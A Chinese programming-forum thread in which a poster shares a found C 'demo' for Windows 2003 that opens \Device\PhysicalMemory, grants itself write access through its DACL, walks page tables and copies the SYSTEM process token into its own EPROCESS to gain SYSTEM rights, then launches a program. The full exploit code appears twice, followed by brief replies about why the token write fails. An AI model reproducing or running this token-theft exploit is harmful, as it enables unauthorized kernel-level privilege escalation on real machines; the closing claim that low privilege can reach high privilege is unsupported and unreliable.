我在网上找的一个demo,思路是“直接将System进程的Token拿过来,放到我们进程的Token位置。那么系统就认为我们是SYSTEM权限.而这时我们的进程创建的子进程也就是SYSTEM权限了”。
#include<windows.h>
#include<stdio.h>
#include<Accctrl.h>
#include<Aclapi.h>
#define TOKEN_OFFSET 0xc8 //In windows 2003, it's 0xc8, if others' version, change it
#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L)
#define STATUS_ACCESS_DENIED ((NTSTATUS)0xC0000022L)
typedef LONG NTSTATUS;
typedef struct _IO_STATUS_BLOCK
{
NTSTATUS Status;
ULONG Information;
} IO_STATUS_BLOCK, *PIO_STATUS_BLOCK;
typedef struct _UNICODE_STRING
{
USHORT Length;
USHORT MaximumLength;
PWSTR Buffer;
} UNICODE_STRING, *PUNICODE_STRING;
#define OBJ_INHERIT 0x00000002L
#define OBJ_PERMANENT 0x00000010L
#define OBJ_EXCLUSIVE 0x00000020L
#define OBJ_CASE_INSENSITIVE 0x00000040L
#define OBJ_OPENIF 0x00000080L
#define OBJ_OPENLINK 0x00000100L
#define OBJ_KERNEL_HANDLE 0x00000200L
#define OBJ_VALID_ATTRIBUTES 0x000003F2L
typedef struct _OBJECT_ATTRIBUTES
{
ULONG Length;
HANDLE RootDirectory;
PUNICODE_STRING ObjectName;
ULONG Attributes;
PVOID SecurityDescriptor;
PVOID SecurityQualityOfService;
} OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES;
typedef struct _SYSTEM_MODULE_INFORMATION
{
ULONG Reserved[2];
PVOID Base;
ULONG Size;
ULONG Flags;
USHORT Index;
USHORT Unknown;
USHORT LoadCount;
USHORT ModuleNameOffset;
CHAR ImageName[256];
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;
typedef enum _SYSTEM_INFORMATION_CLASS
{
SystemBasicInformation,
SystemProcessorInformation,
SystemPerformanceInformation,
SystemTimeOfDayInformation,
SystemNotImplemented1,
SystemProcessesAndThreadsInformation,
SystemCallCounts,
SystemConfigurationInformation,
SystemProcessorTimes,
SystemGlobalFlag,
SystemNotImplemented2,
SystemModuleInformation,
SystemLockInformation,
SystemNotImplemented3,
SystemNotImplemented4,
SystemNotImplemented5,
SystemHandleInformation,
SystemObjectInformation,
SystemPagefileInformation,
SystemInstructionEmulationCounts,
SystemInvalidInfoClass1,
SystemCacheInformation,
SystemPoolTagInformation,
SystemProcessorStatistics,
SystemDpcInformation,
SystemNotImplemented6,
SystemLoadImage,
SystemUnloadImage,
SystemTimeAdjustment,
SystemNotImplemented7,
SystemNotImplemented8,
SystemNotImplemented9,
SystemCrashDumpInformation,
SystemExceptionInformation,
SystemCrashDumpStateInformation,
SystemKernelDebuggerInformation,
SystemContextSwitchInformation,
SystemRegistryQuotaInformation,
SystemLoadAndCallImage,
SystemPrioritySeparation,
SystemNotImplemented10,
SystemNotImplemented11,
SystemInvalidInfoClass2,
SystemInvalidInfoClass3,
SystemTimeZoneInformation,
SystemLookasideInformation,
SystemSetTimeSlipEvent,
SystemCreateSession,
SystemDeleteSession,
SystemInvalidInfoClass4,
SystemRangeStartInformation,
SystemVerifierInformation,
SystemAddVerifier,
SystemSessionProcessesInformation
} SYSTEM_INFORMATION_CLASS;
typedef NTSTATUS ( __stdcall *ZWQUERYSYSTEMINFORMATION )
(
IN SYSTEM_INFORMATION_CLASS SystemInformationClass,
IN OUT PVOID SystemInformation,
IN ULONG SystemInformationLength,
OUT PULONG ReturnLength OPTIONAL
);
typedef NTSTATUS (CALLBACK* ZWOPENSECTION)(
OUT PHANDLE SectionHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes
);
typedef VOID (CALLBACK* RTLINITUNICODESTRING)(
IN OUT PUNICODE_STRING DestinationString,
IN PCWSTR SourceString
);
typedef struct _SYSTEM_HANDLE_INFORMATION
{
ULONG ProcessId;
UCHAR ObjectTypeNumber;
UCHAR Flags;
USHORT Handle;
PVOID Object;
ACCESS_MASK GrantedAccess;
} SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION;
RTLINITUNICODESTRING RtlInitUnicodeString;
ZWOPENSECTION ZwOpenSection;
ZWQUERYSYSTEMINFORMATION ZwQuerySystemInformation = NULL;
HMODULE g_hNtDLL = NULL;
PVOID g_pMapPhysicalMemory = NULL;
HANDLE g_hMPM = NULL;
BOOL InitNTDLL()
{
g_hNtDLL = LoadLibrary( "ntdll.dll" );
if ( !g_hNtDLL )
{
return FALSE;
}
RtlInitUnicodeString =
(RTLINITUNICODESTRING)GetProcAddress( g_hNtDLL, "RtlInitUnicodeString");
ZwOpenSection =
(ZWOPENSECTION)GetProcAddress( g_hNtDLL, "ZwOpenSection");
ZwQuerySystemInformation =
( ZWQUERYSYSTEMINFORMATION )GetProcAddress( g_hNtDLL, "ZwQuerySystemInformation" );
ZwQuerySystemInformation =
( ZWQUERYSYSTEMINFORMATION )GetProcAddress( g_hNtDLL, "ZwQuerySystemInformation" );
return TRUE;
}
VOID CloseNTDLL()
{
if(g_hNtDLL != NULL)
{
FreeLibrary(g_hNtDLL);
}
}
VOID SetPhyscialMemorySectionCanBeWrited(HANDLE hSection)
{
PACL pDacl=NULL;
PACL pNewDacl=NULL;
PSECURITY_DESCRIPTOR pSD=NULL;
DWORD dwRes;
EXPLICIT_ACCESS ea;
if(dwRes=GetSecurityInfo(hSection,SE_KERNEL_OBJECT,DACL_SECURITY_INFORMATION,
NULL,NULL,&pDacl,NULL,&pSD)!=ERROR_SUCCESS)
{
goto CleanUp;
}
ZeroMemory(&ea, sizeof(EXPLICIT_ACCESS));
ea.grfAccessPermissions = SECTION_MAP_WRITE;
ea.grfAccessMode = GRANT_ACCESS;
ea.grfInheritance= NO_INHERITANCE;
ea.Trustee.TrusteeForm = TRUSTEE_IS_NAME;
ea.Trustee.TrusteeType = TRUSTEE_IS_USER;
ea.Trustee.ptstrName = "CURRENT_USER";
if(dwRes=SetEntriesInAcl(1,&ea,pDacl,&pNewDacl)!=ERROR_SUCCESS)
{
goto CleanUp;
}
if(dwRes=SetSecurityInfo(hSection,SE_KERNEL_OBJECT,DACL_SECURITY_INFORMATION,NULL,NULL,pNewDacl,NULL)!=ERROR_SUCCESS)
{
goto CleanUp;
}
CleanUp:
if(pSD)
LocalFree(pSD);
if(pNewDacl)
LocalFree(pNewDacl);
}
HANDLE OpenPhysicalMemory()
{
NTSTATUS status;
UNICODE_STRING physmemString;
OBJECT_ATTRIBUTES attributes;
RtlInitUnicodeString( &physmemString, L"\\Device\\PhysicalMemory" );
attributes.Length = sizeof(OBJECT_ATTRIBUTES);
attributes.RootDirectory = NULL;
attributes.ObjectName = &physmemString;
attributes.Attributes = 0;
attributes.SecurityDescriptor = NULL;
attributes.SecurityQualityOfService = NULL;
status = ZwOpenSection(&g_hMPM,SECTION_MAP_READ|SECTION_MAP_WRITE,&attributes);
if(status == STATUS_ACCESS_DENIED){
status = ZwOpenSection(&g_hMPM,READ_CONTROL|WRITE_DAC,&attributes);
SetPhyscialMemorySectionCanBeWrited(g_hMPM);
CloseHandle(g_hMPM);
status =ZwOpenSection(&g_hMPM,SECTION_MAP_READ|SECTION_MAP_WRITE,&attributes);
}
if( !NT_SUCCESS( status ))
{
return NULL;
}
g_pMapPhysicalMemory = MapViewOfFile(
g_hMPM,
4,
0,
0x300000,
0x1000);
if( g_pMapPhysicalMemory == NULL )
{
return NULL;
}
return g_hMPM;
}
7 个解决方案
#1
PVOID LinearToPhys(PULONG BaseAddress,PVOID addr)
{
ULONG VAddr=(ULONG)addr,PGDE,PTE,PAddr;
if(VAddr>=0x80000000 && VAddr<0xa0000000)
{
PAddr=VAddr-0x80000000;
return (PVOID)PAddr;
}
PGDE=BaseAddress[VAddr>>22];
if ((PGDE&1)!=0)
{
ULONG tmp=PGDE&0x00000080;
if (tmp!=0)
{
PAddr=(PGDE&0xFFC00000)+(VAddr&0x003FFFFF);
}
else
{
PGDE=(ULONG)MapViewOfFile(g_hMPM, FILE_MAP_ALL_ACCESS, 0, PGDE & 0xfffff000, 0x1000);
PTE=((PULONG)PGDE)[(VAddr&0x003FF000)>>12];
if ((PTE&1)!=0)
{
PAddr=(PTE&0xFFFFF000)+(VAddr&0x00000FFF);
UnmapViewOfFile((PVOID)PGDE);
}
else return 0;
}
}
else return 0;
return (PVOID)PAddr;
}
ULONG GetData(PVOID addr)
{
ULONG phys=(ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory,(PVOID)addr);
PULONG tmp=(PULONG)MapViewOfFile(g_hMPM, 4, 0, phys & 0xfffff000, 0x1000);
if (tmp==0)
return 0;
ULONG ret=tmp[(phys & 0xFFF)>>2];
UnmapViewOfFile(tmp);
return ret;
}
BOOL SetData(PVOID addr,ULONG data)
{
ULONG phys=(ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory,(PVOID)addr);
PULONG tmp=(PULONG)MapViewOfFile(g_hMPM, FILE_MAP_WRITE, 0, phys & 0xfffff000, 0x1000);
if (tmp==0)
return FALSE;
tmp[(phys & 0xFFF)>>2]=data;
UnmapViewOfFile(tmp);
return TRUE;
}
DWORD MyGetModuleBaseAddress( char * pModuleName)
{
PSYSTEM_MODULE_INFORMATION pSysModule;
ULONG uReturn;
ULONG uCount;
PCHAR pBuffer = NULL;
PCHAR pName = NULL;
NTSTATUS status;
UINT ui;
CHAR szBuffer[10];
DWORD pBaseAddress;
status = ZwQuerySystemInformation( SystemModuleInformation, szBuffer, 10, &uReturn );
pBuffer = ( PCHAR )malloc(uReturn);
if ( pBuffer )
{
status = ZwQuerySystemInformation( SystemModuleInformation, pBuffer, uReturn, &uReturn );
if( NT_SUCCESS(status) )
{
uCount = ( ULONG )*( ( ULONG * )pBuffer );
pSysModule = ( PSYSTEM_MODULE_INFORMATION )( pBuffer + sizeof( ULONG ) );
for ( ui = 0; ui < uCount; ui++ )
{
pName = strstr( pSysModule->ImageName, pModuleName );
if( pName )
{
pBaseAddress = (DWORD)pSysModule->Base;
free( pBuffer );
return pBaseAddress;
}
pSysModule ++;
}
}
free( pBuffer );
}
return NULL;
}
DWORD GetEprocessFromId (DWORD PID)
{
NTSTATUS status;
PVOID buf = NULL;
ULONG size = 1;
ULONG NumOfHandle = 0;
ULONG i;
PSYSTEM_HANDLE_INFORMATION h_info = NULL;
DWORD n;
DWORD retvalue=0;
buf=malloc(0x1000);
if(buf == NULL)
{
printf("malloc wrong\n");
return FALSE;
}
status = ZwQuerySystemInformation( SystemHandleInformation, buf, 0x1000, &n );
if(STATUS_INFO_LENGTH_MISMATCH == status)
{
free(buf);
buf=malloc(n);
if(buf == NULL)
{
printf("malloc wrong\n");
return FALSE;
}
status = ZwQuerySystemInformation( SystemHandleInformation, buf, n, NULL);
}
else
{
printf("ZwQuerySystemInformation wrong\n");
return FALSE;
}
NumOfHandle = *(ULONG*)buf;
h_info = ( PSYSTEM_HANDLE_INFORMATION )((ULONG)buf+4);
for(i = 0; i<NumOfHandle ;i++)
{
if( h_info[i].ProcessId == PID &&( h_info[i].ObjectTypeNumber == 5 ))
{
retvalue=(DWORD)(h_info[i].Object);
break;
}
}
if ( buf != NULL )
{
free( buf );
}
return retvalue;
}
void usage(char *exe)
{
printf("Usage : %s [exefile|-h]\n");
}
int main(int argc, char **argv)
{
HMODULE hDll;
DWORD tmp;
DWORD SystemEprocess;
DWORD SystemEprocessTokenValue;
DWORD CurrentEprocess;
DWORD CurrentEprocessTokenValue;
printf("\nIt is intended to get SYSTEM privilege from administrators group.\n");
printf("\tMade by ZwelL.\n");
printf("\tZwell@sohu.com.\n");
printf("\thttp://www.donews.net/zwell.\n");
printf("\tType -h to get more information\n", argv[0]);
if( argc>=2)
{
if(
( (strcmp(argv[1],"-h")==0) && (argc==2))
|| (argc>2)
)
{
usage(argv[0]);
exit(-1);
}
}
if (!InitNTDLL())
{
printf("InitNTDLL wrong\n");
exit(-1);
}
if (OpenPhysicalMemory()==0)
{
printf("OpenPhysicalMemory wrong\n");
exit(-1);
}
// 得到PsInitialSystemProcess的线性地址
hDll = LoadLibrary("ntoskrnl.exe");
tmp = (DWORD)GetProcAddress(hDll, "PsInitialSystemProcess");
tmp=MyGetModuleBaseAddress("ntoskrnl.exe")+(DWORD)tmp-(DWORD)hDll;
// 把现线性地址转化为物理地址,得到SYSTEM的EPROCESS的物理地址
SystemEprocess = GetData((PVOID)tmp);
tmp=SystemEprocess+TOKEN_OFFSET; //SYSTEM's Token address
// 得到SYSTEM的EPROCESS中Token的物理地址
SystemEprocessTokenValue = GetData((PVOID)tmp); //SYSTEM's Token
printf("System Process Token : %08X\n", SystemEprocessTokenValue);
OpenProcess( PROCESS_ALL_ACCESS,FALSE,GetCurrentProcessId() );
CurrentEprocess = GetEprocessFromId(GetCurrentProcessId());
CurrentEprocessTokenValue = GetData((PVOID)(CurrentEprocess+TOKEN_OFFSET));
printf("Current EPROCESS : %08x\n", CurrentEprocess);
printf("Current Process Token : %08x\n",
CurrentEprocessTokenValue);
// 修改当前进程的token,使其具有system权限
if(!SetData((PVOID)(CurrentEprocessTokenValue), SystemEprocessTokenValue))
{
printf("SetData Error\n");
}
printf("Current Process Token : %08x\n",
GetData((PVOID)(GetEprocessFromId(GetCurrentProcessId())+TOKEN_OFFSET)));
printf("Current CurrentEprocess Token : %08x\n",GetData((PVOID)(CurrentEprocess+TOKEN_OFFSET)));
printf("Current SystemEprocess Token : %08x\n",GetData((PVOID)(SystemEprocess+TOKEN_OFFSET)));
// 系统的token随时在变,所以在执行程序之前要再检查一下
if( GetData((PVOID)(CurrentEprocess+TOKEN_OFFSET))
== GetData((PVOID)(SystemEprocess+TOKEN_OFFSET))
)
// It is so surprised that SYSTEM's Token always in changing.
// So before create new process, we should ensure the TOKEN is all right
{
ShellExecute(NULL, "open", (argc==2)?argv[1]:"c:\\windows\\notepad.exe", NULL, NULL, SW_SHOWNORMAL);
}
UnmapViewOfFile(g_pMapPhysicalMemory);
CloseHandle(g_hMPM);
CloseNTDLL();
return 0;
}
#2
拿Token的程序本身要有SYSTEM 或更高的权限,它才可以给它启动的进程一样的,或更低的权限,这是安全设置...
#3
问题出现在 SetData 函数,无法将 SystemEprocessTokenValue 替换 CurrentEprocessTokenValue。
求高手指点~
求高手指点~
#4
您的意思是:我现在用计算机管理员的权限运行这个代码 ,不足以拿到 SYSTEM 的权限?有没有可能用用计算机管理员的权限实现这样的要求呢?若可以,求一个解决方案?
还是将这个代码做成系统服务?
#5
你想想,显然不会一个管理权限的程序拿到SYSTEM权限..不然系统会有Security issue...改成系统Service吧
#6
其实 我是想通过程序创建一个文件夹,并且设置它的访问权限只有 SYSTEM 。
我的思路是使用 CreateDirectory 先建好文件夹,再通过 SetSecurityInfo 设置访问权限,
但是不清楚 SetSecurityInfo 的参数该如何设置 ,恳请高手指点迷津!
我的思路是使用 CreateDirectory 先建好文件夹,再通过 SetSecurityInfo 设置访问权限,
但是不清楚 SetSecurityInfo 的参数该如何设置 ,恳请高手指点迷津!
#7
问题已解决,事实上是可以用较低权限拿到高级权限的
#1
PVOID LinearToPhys(PULONG BaseAddress,PVOID addr)
{
ULONG VAddr=(ULONG)addr,PGDE,PTE,PAddr;
if(VAddr>=0x80000000 && VAddr<0xa0000000)
{
PAddr=VAddr-0x80000000;
return (PVOID)PAddr;
}
PGDE=BaseAddress[VAddr>>22];
if ((PGDE&1)!=0)
{
ULONG tmp=PGDE&0x00000080;
if (tmp!=0)
{
PAddr=(PGDE&0xFFC00000)+(VAddr&0x003FFFFF);
}
else
{
PGDE=(ULONG)MapViewOfFile(g_hMPM, FILE_MAP_ALL_ACCESS, 0, PGDE & 0xfffff000, 0x1000);
PTE=((PULONG)PGDE)[(VAddr&0x003FF000)>>12];
if ((PTE&1)!=0)
{
PAddr=(PTE&0xFFFFF000)+(VAddr&0x00000FFF);
UnmapViewOfFile((PVOID)PGDE);
}
else return 0;
}
}
else return 0;
return (PVOID)PAddr;
}
ULONG GetData(PVOID addr)
{
ULONG phys=(ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory,(PVOID)addr);
PULONG tmp=(PULONG)MapViewOfFile(g_hMPM, 4, 0, phys & 0xfffff000, 0x1000);
if (tmp==0)
return 0;
ULONG ret=tmp[(phys & 0xFFF)>>2];
UnmapViewOfFile(tmp);
return ret;
}
BOOL SetData(PVOID addr,ULONG data)
{
ULONG phys=(ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory,(PVOID)addr);
PULONG tmp=(PULONG)MapViewOfFile(g_hMPM, FILE_MAP_WRITE, 0, phys & 0xfffff000, 0x1000);
if (tmp==0)
return FALSE;
tmp[(phys & 0xFFF)>>2]=data;
UnmapViewOfFile(tmp);
return TRUE;
}
DWORD MyGetModuleBaseAddress( char * pModuleName)
{
PSYSTEM_MODULE_INFORMATION pSysModule;
ULONG uReturn;
ULONG uCount;
PCHAR pBuffer = NULL;
PCHAR pName = NULL;
NTSTATUS status;
UINT ui;
CHAR szBuffer[10];
DWORD pBaseAddress;
status = ZwQuerySystemInformation( SystemModuleInformation, szBuffer, 10, &uReturn );
pBuffer = ( PCHAR )malloc(uReturn);
if ( pBuffer )
{
status = ZwQuerySystemInformation( SystemModuleInformation, pBuffer, uReturn, &uReturn );
if( NT_SUCCESS(status) )
{
uCount = ( ULONG )*( ( ULONG * )pBuffer );
pSysModule = ( PSYSTEM_MODULE_INFORMATION )( pBuffer + sizeof( ULONG ) );
for ( ui = 0; ui < uCount; ui++ )
{
pName = strstr( pSysModule->ImageName, pModuleName );
if( pName )
{
pBaseAddress = (DWORD)pSysModule->Base;
free( pBuffer );
return pBaseAddress;
}
pSysModule ++;
}
}
free( pBuffer );
}
return NULL;
}
DWORD GetEprocessFromId (DWORD PID)
{
NTSTATUS status;
PVOID buf = NULL;
ULONG size = 1;
ULONG NumOfHandle = 0;
ULONG i;
PSYSTEM_HANDLE_INFORMATION h_info = NULL;
DWORD n;
DWORD retvalue=0;
buf=malloc(0x1000);
if(buf == NULL)
{
printf("malloc wrong\n");
return FALSE;
}
status = ZwQuerySystemInformation( SystemHandleInformation, buf, 0x1000, &n );
if(STATUS_INFO_LENGTH_MISMATCH == status)
{
free(buf);
buf=malloc(n);
if(buf == NULL)
{
printf("malloc wrong\n");
return FALSE;
}
status = ZwQuerySystemInformation( SystemHandleInformation, buf, n, NULL);
}
else
{
printf("ZwQuerySystemInformation wrong\n");
return FALSE;
}
NumOfHandle = *(ULONG*)buf;
h_info = ( PSYSTEM_HANDLE_INFORMATION )((ULONG)buf+4);
for(i = 0; i<NumOfHandle ;i++)
{
if( h_info[i].ProcessId == PID &&( h_info[i].ObjectTypeNumber == 5 ))
{
retvalue=(DWORD)(h_info[i].Object);
break;
}
}
if ( buf != NULL )
{
free( buf );
}
return retvalue;
}
void usage(char *exe)
{
printf("Usage : %s [exefile|-h]\n");
}
int main(int argc, char **argv)
{
HMODULE hDll;
DWORD tmp;
DWORD SystemEprocess;
DWORD SystemEprocessTokenValue;
DWORD CurrentEprocess;
DWORD CurrentEprocessTokenValue;
printf("\nIt is intended to get SYSTEM privilege from administrators group.\n");
printf("\tMade by ZwelL.\n");
printf("\tZwell@sohu.com.\n");
printf("\thttp://www.donews.net/zwell.\n");
printf("\tType -h to get more information\n", argv[0]);
if( argc>=2)
{
if(
( (strcmp(argv[1],"-h")==0) && (argc==2))
|| (argc>2)
)
{
usage(argv[0]);
exit(-1);
}
}
if (!InitNTDLL())
{
printf("InitNTDLL wrong\n");
exit(-1);
}
if (OpenPhysicalMemory()==0)
{
printf("OpenPhysicalMemory wrong\n");
exit(-1);
}
// 得到PsInitialSystemProcess的线性地址
hDll = LoadLibrary("ntoskrnl.exe");
tmp = (DWORD)GetProcAddress(hDll, "PsInitialSystemProcess");
tmp=MyGetModuleBaseAddress("ntoskrnl.exe")+(DWORD)tmp-(DWORD)hDll;
// 把现线性地址转化为物理地址,得到SYSTEM的EPROCESS的物理地址
SystemEprocess = GetData((PVOID)tmp);
tmp=SystemEprocess+TOKEN_OFFSET; //SYSTEM's Token address
// 得到SYSTEM的EPROCESS中Token的物理地址
SystemEprocessTokenValue = GetData((PVOID)tmp); //SYSTEM's Token
printf("System Process Token : %08X\n", SystemEprocessTokenValue);
OpenProcess( PROCESS_ALL_ACCESS,FALSE,GetCurrentProcessId() );
CurrentEprocess = GetEprocessFromId(GetCurrentProcessId());
CurrentEprocessTokenValue = GetData((PVOID)(CurrentEprocess+TOKEN_OFFSET));
printf("Current EPROCESS : %08x\n", CurrentEprocess);
printf("Current Process Token : %08x\n",
CurrentEprocessTokenValue);
// 修改当前进程的token,使其具有system权限
if(!SetData((PVOID)(CurrentEprocessTokenValue), SystemEprocessTokenValue))
{
printf("SetData Error\n");
}
printf("Current Process Token : %08x\n",
GetData((PVOID)(GetEprocessFromId(GetCurrentProcessId())+TOKEN_OFFSET)));
printf("Current CurrentEprocess Token : %08x\n",GetData((PVOID)(CurrentEprocess+TOKEN_OFFSET)));
printf("Current SystemEprocess Token : %08x\n",GetData((PVOID)(SystemEprocess+TOKEN_OFFSET)));
// 系统的token随时在变,所以在执行程序之前要再检查一下
if( GetData((PVOID)(CurrentEprocess+TOKEN_OFFSET))
== GetData((PVOID)(SystemEprocess+TOKEN_OFFSET))
)
// It is so surprised that SYSTEM's Token always in changing.
// So before create new process, we should ensure the TOKEN is all right
{
ShellExecute(NULL, "open", (argc==2)?argv[1]:"c:\\windows\\notepad.exe", NULL, NULL, SW_SHOWNORMAL);
}
UnmapViewOfFile(g_pMapPhysicalMemory);
CloseHandle(g_hMPM);
CloseNTDLL();
return 0;
}
#2
拿Token的程序本身要有SYSTEM 或更高的权限,它才可以给它启动的进程一样的,或更低的权限,这是安全设置...
#3
问题出现在 SetData 函数,无法将 SystemEprocessTokenValue 替换 CurrentEprocessTokenValue。
求高手指点~
求高手指点~
#4
您的意思是:我现在用计算机管理员的权限运行这个代码 ,不足以拿到 SYSTEM 的权限?有没有可能用用计算机管理员的权限实现这样的要求呢?若可以,求一个解决方案?
还是将这个代码做成系统服务?
#5
你想想,显然不会一个管理权限的程序拿到SYSTEM权限..不然系统会有Security issue...改成系统Service吧
#6
其实 我是想通过程序创建一个文件夹,并且设置它的访问权限只有 SYSTEM 。
我的思路是使用 CreateDirectory 先建好文件夹,再通过 SetSecurityInfo 设置访问权限,
但是不清楚 SetSecurityInfo 的参数该如何设置 ,恳请高手指点迷津!
我的思路是使用 CreateDirectory 先建好文件夹,再通过 SetSecurityInfo 设置访问权限,
但是不清楚 SetSecurityInfo 的参数该如何设置 ,恳请高手指点迷津!
#7
问题已解决,事实上是可以用较低权限拿到高级权限的